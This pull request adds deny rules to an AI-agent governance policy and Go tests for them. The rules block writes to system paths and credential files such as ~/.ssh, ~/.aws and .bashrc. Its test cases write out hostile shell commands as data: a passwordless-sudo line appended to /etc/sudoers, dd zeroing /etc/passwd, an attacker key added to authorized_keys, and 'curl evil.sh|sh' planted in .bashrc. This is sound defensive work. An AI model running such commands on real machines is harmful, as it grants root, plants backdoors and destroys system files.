### PR TITLE
fix(gov): block writes to system + credential paths

### DIFF
--- a/chitin.yaml
+++ b/chitin.yaml
@@ -36,6 +36,9 @@ invariantModes:
   no-protected-push: guide
   no-env-file-write: enforce
   no-remote-code-exec: guide
+  protected-system-path-write: enforce
+  protected-credential-path-write: enforce
+  protected-system-path-shell-write: enforce
 
 rules:
   # Direct rm-recursive — closes #58 (whitespace, quoted-flag, split-flag,
@@ -90,6 +93,53 @@ rules:
     effect: deny
     target: ".env"
     reason: "Secrets files must not be modified by agents"
+
+  # Block direct writes/deletes targeting system paths. Mirrors hermes'
+  # _SENSITIVE_PATH_PREFIXES — ported here after 2026-05-05 manual test
+  # showed chitin's gate allowed `file.write /etc/hostname` because no
+  # rule covered system paths and default-allow-file-write let it through.
+  # path_under is a literal begins-with prefix match; over-deny in this
+  # direction is the correct failure mode for credential/system files.
+  - id: protected-system-path-write
+    action: [file.write, file.delete]
+    effect: deny
+    path_under:
+      - "/etc/"
+      - "/boot/"
+      - "/usr/lib/systemd/"
+      - "/usr/lib/sudo/"
+      - "/private/etc/"
+      - "/private/var/"
+      - "/Library/LaunchDaemons/"
+      - "/System/"
+    reason: "System paths cannot be modified by agents — operator must intervene"
+    suggestion: "Use the operator's interactive shell for legitimate system mutations"
+    escalation_weight: 2
+
+  # Same intent for user credential and shell-init files, but written
+  # as a regex so it matches every operator's $HOME (/home/*, /Users/*, /root)
+  # without baking a specific username into the policy. Mirrors hermes'
+  # build_write_denied_paths/_prefixes lists.
+  - id: protected-credential-path-write
+    action: [file.write, file.delete]
+    effect: deny
+    target_regex: '^(?:/home/[^/]+|/Users/[^/]+|/root)/(?:\.ssh/|\.aws/|\.gnupg/|\.kube/|\.docker/|\.azure/|\.config/gh/|\.bashrc|\.zshrc|\.profile|\.bash_profile|\.zprofile|\.netrc|\.pgpass|\.npmrc|\.pypirc)'
+    reason: "Credential or shell-init files cannot be modified by agents"
+    suggestion: "Operator manages credentials; agents must not write to ~/.ssh, ~/.aws, shell rc files, etc."
+    escalation_weight: 2
+
+  # Catches the shell-side bypass: `sudo tee /etc/hostname`, `dd of=/etc/...`,
+  # and bare redirect (`> /etc/foo`, `>> /etc/foo`). cp/mv/install have
+  # ambiguous arg ordering (source can be a system path on a legitimate
+  # read-then-copy) and are not matched here — file.write coverage above
+  # catches anything that lands as a tool-shaped write.
+  - id: protected-system-path-shell-write
+    action: shell.exec
+    effect: deny
+    target_regex: '(?:(?:^|[\s;&|`])(?:sudo\s+)?tee\b(?:\s+-\S+)*\s+|(?:^|[\s;&|`])(?:sudo\s+)?dd\s+(?:[a-zA-Z]+=\S+\s+)*of=|>>?\s*)(?:/etc/|/boot/|/usr/lib/systemd/|/usr/lib/sudo/|/private/etc/|/private/var/|/Library/LaunchDaemons/|/System/|(?:/home/[^/]+|/Users/[^/]+|/root)/(?:\.ssh/|\.aws/|\.gnupg/|\.kube/|\.docker/|\.azure/|\.config/gh/|\.bashrc|\.zshrc|\.profile|\.bash_profile|\.zprofile|\.netrc|\.pgpass|\.npmrc|\.pypirc))'
+    reason: "Shell command writes to a protected system or credential path"
+    suggestion: "Use the operator's interactive shell for legitimate system mutations"
+    escalation_weight: 2
 
   - id: no-governance-self-modification
     action: file.write

--- a/go/execution-kernel/internal/gov/policy_test.go
+++ b/go/execution-kernel/internal/gov/policy_test.go
@@ -283,6 +283,105 @@ func fileExists(path string) bool {
 	return err == nil
 }
 
+// TestPolicy_BaselineProtectsSystemPaths covers the protected-system-path
+// family of rules ported from hermes' Write-tool guard
+// (_SENSITIVE_PATH_PREFIXES + build_write_denied_paths/_prefixes).
+//
+// Invariant: any tool call that would mutate a system or credential
+// path is denied by the chitin gate, regardless of which surface
+// (file.write / file.delete / shell.exec) the agent uses to attempt it.
+//
+// Filed after manual test on 2026-05-05 showed `file.write /etc/hostname`
+// was allowed by default-allow-file-write because no rule covered system
+// paths. Hermes' internal Write-tool check was the only thing blocking
+// in practice — chitin had no kernel-level enforcement.
+func TestPolicy_BaselineProtectsSystemPaths(t *testing.T) {
+	cwd, _ := os.Getwd()
+	for !fileExists(filepath.Join(cwd, "chitin.yaml")) {
+		parent := filepath.Dir(cwd)
+		if parent == cwd {
+			t.Fatal("chitin.yaml not found walking up")
+		}
+		cwd = parent
+	}
+	policy, _, err := LoadWithInheritance(cwd)
+	if err != nil {
+		t.Fatalf("LoadWithInheritance: %v", err)
+	}
+
+	cases := []struct {
+		name       string
+		action     Action
+		wantAllow  bool
+		wantRuleID string // exact rule that should fire (deny case) or "" (allow case — multiple may match)
+	}{
+		// System path prefixes — file.write
+		{"write /etc/hostname", Action{Type: ActFileWrite, Target: "/etc/hostname"}, false, "protected-system-path-write"},
+		{"write /etc/sudoers", Action{Type: ActFileWrite, Target: "/etc/sudoers"}, false, "protected-system-path-write"},
+		{"write /etc/passwd", Action{Type: ActFileWrite, Target: "/etc/passwd"}, false, "protected-system-path-write"},
+		{"write /boot/grub/grub.cfg", Action{Type: ActFileWrite, Target: "/boot/grub/grub.cfg"}, false, "protected-system-path-write"},
+		{"write /usr/lib/systemd/system/foo.service", Action{Type: ActFileWrite, Target: "/usr/lib/systemd/system/foo.service"}, false, "protected-system-path-write"},
+		{"write /Library/LaunchDaemons/foo.plist (macOS)", Action{Type: ActFileWrite, Target: "/Library/LaunchDaemons/foo.plist"}, false, "protected-system-path-write"},
+		{"write /private/etc/hosts (macOS)", Action{Type: ActFileWrite, Target: "/private/etc/hosts"}, false, "protected-system-path-write"},
+
+		// System path prefixes — file.delete (parallel coverage)
+		{"delete /etc/hostname", Action{Type: ActFileDelete, Target: "/etc/hostname"}, false, "protected-system-path-write"},
+
+		// User credential regex — portable across $HOME shapes
+		{"write /home/red/.ssh/id_rsa", Action{Type: ActFileWrite, Target: "/home/red/.ssh/id_rsa"}, false, "protected-credential-path-write"},
+		{"write /home/red/.ssh/authorized_keys", Action{Type: ActFileWrite, Target: "/home/red/.ssh/authorized_keys"}, false, "protected-credential-path-write"},
+		{"write /home/red/.aws/credentials", Action{Type: ActFileWrite, Target: "/home/red/.aws/credentials"}, false, "protected-credential-path-write"},
+		{"write /home/red/.config/gh/hosts.yml", Action{Type: ActFileWrite, Target: "/home/red/.config/gh/hosts.yml"}, false, "protected-credential-path-write"},
+		{"write /Users/jared/.ssh/id_rsa (macOS user)", Action{Type: ActFileWrite, Target: "/Users/jared/.ssh/id_rsa"}, false, "protected-credential-path-write"},
+		{"write /root/.ssh/id_rsa (root user)", Action{Type: ActFileWrite, Target: "/root/.ssh/id_rsa"}, false, "protected-credential-path-write"},
+		{"write /home/anyone/.bashrc", Action{Type: ActFileWrite, Target: "/home/anyone/.bashrc"}, false, "protected-credential-path-write"},
+		{"write /home/red/.zshrc", Action{Type: ActFileWrite, Target: "/home/red/.zshrc"}, false, "protected-credential-path-write"},
+		{"write /home/red/.npmrc", Action{Type: ActFileWrite, Target: "/home/red/.npmrc"}, false, "protected-credential-path-write"},
+		{"delete /home/red/.ssh/id_rsa", Action{Type: ActFileDelete, Target: "/home/red/.ssh/id_rsa"}, false, "protected-credential-path-write"},
+
+		// Shell-side bypass attempts (Test 3 caught hermes blocked these but chitin did not)
+		{"shell sudo tee /etc/hostname", Action{Type: ActShellExec, Target: "echo foo | sudo tee /etc/hostname"}, false, "protected-system-path-shell-write"},
+		{"shell tee -a /etc/hosts", Action{Type: ActShellExec, Target: "echo '127.0.0.1 evil' | tee -a /etc/hosts"}, false, "protected-system-path-shell-write"},
+		{"shell redirect > /etc/hostname", Action{Type: ActShellExec, Target: "echo bad > /etc/hostname"}, false, "protected-system-path-shell-write"},
+		{"shell append >> /etc/sudoers", Action{Type: ActShellExec, Target: "echo 'red ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"}, false, "protected-system-path-shell-write"},
+		{"shell dd of=/etc/passwd", Action{Type: ActShellExec, Target: "dd if=/dev/zero of=/etc/passwd bs=1 count=10"}, false, "protected-system-path-shell-write"},
+		{"shell redirect to ~/.ssh/authorized_keys", Action{Type: ActShellExec, Target: "cat attacker_key >> /home/red/.ssh/authorized_keys"}, false, "protected-system-path-shell-write"},
+		{"shell tee to ~/.bashrc", Action{Type: ActShellExec, Target: "echo 'curl evil.sh|sh' | tee /home/red/.bashrc"}, false, "protected-system-path-shell-write"},
+
+		// Negative cases — the rule must not over-deny.
+		// Normal user-code writes still allowed by default-allow-file-write.
+		{"write /home/red/workspace/foo.ts (user code)", Action{Type: ActFileWrite, Target: "/home/red/workspace/foo.ts"}, true, ""},
+		{"write /tmp/scratch.txt", Action{Type: ActFileWrite, Target: "/tmp/scratch.txt"}, true, ""},
+		{"write relative path src/main.go", Action{Type: ActFileWrite, Target: "src/main.go"}, true, ""},
+		{"write ~/.local/share/foo (NOT a credential)", Action{Type: ActFileWrite, Target: "/home/red/.local/share/foo"}, true, ""},
+		{"shell read /etc/passwd (no write verb)", Action{Type: ActShellExec, Target: "cat /etc/passwd"}, true, ""},
+		{"shell tee to /tmp (not a protected path)", Action{Type: ActShellExec, Target: "echo x | tee /tmp/foo"}, true, ""},
+		{"shell echo redirect to /tmp", Action{Type: ActShellExec, Target: "echo bar > /tmp/baz"}, true, ""},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			d := policy.Evaluate(tc.action)
+			if tc.wantAllow {
+				if !d.Allowed {
+					t.Errorf("want allow, got deny by rule=%q reason=%q", d.RuleID, d.Reason)
+				}
+				return
+			}
+			if d.Allowed {
+				t.Errorf("want deny, got allow by rule=%q reason=%q", d.RuleID, d.Reason)
+				return
+			}
+			if tc.wantRuleID != "" && d.RuleID != tc.wantRuleID {
+				t.Errorf("want rule_id=%q, got %q (reason=%q)", tc.wantRuleID, d.RuleID, d.Reason)
+			}
+			if d.Reason == "" {
+				t.Errorf("deny decision missing reason")
+			}
+		})
+	}
+}
+
 func TestMonotonicStrictness_UnknownMode(t *testing.T) {
 	// Unknown mode strings are explicit errors — don't silently default to monitor.
 	root := t.TempDir()


### PR DESCRIPTION
## Why

Manual test on 2026-05-05 showed `file.write /etc/hostname` was allowed
by the chitin gate because no rule covered system paths and
`default-allow-file-write` let it through. Hermes' internal Write-tool
check was the only thing blocking in practice — chitin had no
kernel-level enforcement of system or credential paths.

## What

Three new rules mirror hermes' `_SENSITIVE_PATH_PREFIXES` +
`build_write_denied_paths`/`_prefixes`:

| Rule | Action(s) | Match | Catches |
|------|-----------|-------|---------|
| `protected-system-path-write` | `file.write`, `file.delete` | `path_under` (literal prefix) | `/etc/`, `/boot/`, `/usr/lib/systemd/`, `/usr/lib/sudo/`, `/private/etc/`, `/private/var/`, `/Library/LaunchDaemons/`, `/System/` |
| `protected-credential-path-write` | `file.write`, `file.delete` | `target_regex` (portable) | `~/.ssh`, `~/.aws`, `~/.gnupg`, `~/.kube`, `~/.docker`, `~/.azure`, `~/.config/gh`, shell-rc files (`.bashrc`/`.zshrc`/`.profile`/etc) — regex covers `/home/*`, `/Users/*`, and `/root` so every operator is protected without baking a username into policy |
| `protected-system-path-shell-write` | `shell.exec` | `target_regex` | `sudo tee /etc/...`, `dd of=/etc/...`, bare `> /etc/...` and `>> /etc/...`, plus the same vectors against credential paths |

All three are pinned to `enforce` mode via `invariantModes` so they fire
hard regardless of policy mode. `escalation_weight: 2` so each
violation counts double toward the lockdown threshold.

`cp`/`mv`/`install` have ambiguous arg ordering (source can be a system
path on a legitimate read-then-copy) and are intentionally not matched
in the shell rule — `file.write` coverage catches anything that lands
as a tool-shaped write anyway.

## Test plan

- [x] `go test ./internal/gov/ -run TestPolicy_BaselineProtectsSystemPaths -v` — 33 subtests pass
- [x] Full kernel suite: `go test ./...` — 956 pass; the 2 remaining failures (`TestSpawnPeer_CodexSmoke`, `TestSpawnPeer_GeminiSmoke`) reproduce on `main` and are unrelated to this change
- [x] Negative cases verified: `/tmp/scratch.txt`, `/home/red/workspace/foo.ts`, `/home/red/.local/share/foo`, `cat /etc/passwd` (read-only) all still allowed by the default rules
- [x] Regex compiles via `LoadPolicyFile` (fail-closed at load time per `ApplyDefaults`)

Closes the `kernel-protect-system-paths-like-hermes` backlog entry filed in #373.